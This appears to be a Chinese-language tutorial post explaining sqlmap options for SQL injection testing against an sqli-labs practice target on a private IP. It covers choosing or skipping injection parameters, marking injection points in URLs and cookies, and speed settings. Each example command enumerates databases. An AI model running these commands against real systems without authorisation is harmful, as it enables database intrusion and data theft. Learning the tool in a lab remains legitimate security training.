一、指定位置注入

1、-p，指定具体探测的参数

sqlmap -u http://192.168.1.121/sqli/Less-1/?id=1 -p id --dbs 对id进行探测

sqlmap -u http://192.168.1.121/sqli/Less-1/?id=1&&name=2 -p “id,name” --dbs 对id和name都进行探测

2、–skip，忽略探测的参数

sqlmap -u http://192.168.1.121/sqli/Less-1/?id=1&&name=2 --level 5 --skip host --dbs 5级对所有存在的注入点进行探测，这里忽略了host

3、–param-exclude，忽略包含具体内容的参数

–param-exclude=“id|name”

4、–skip-static 忽略非动态参数

5、用“*”指定注入位置,

sqlmap -u http://192.168.1.121/sqli/Less-1/?id=1*&&name=2*&&tab=3 --dbs

sqlmap -u http://192.168.1.121/sqli/Less-1/?id=1&&name=2&&tab=3 --cookie=“un=adm*;pw=adm”–dbs

sqlmap -u http://192.168.1.121/sqli/Less-1/?id=1&&name=2&&tab=3 --cookie="*"–dbs

二、优化性能

1、设置连接为持久连接

http报文中设置Connection:Keep-Alive
sqlmap中加参数 --keep-alive

2、设置不接受http当中的body，常用在盲注

–null-connection

3、设置多线程

–thread 默认是1个线程，最大线程为10

4、预测输出

–predict-output，不能与thread同时用

5、开启所有优化

-o

禁止非法，后果自负

欢迎关注公众号：web安全工具库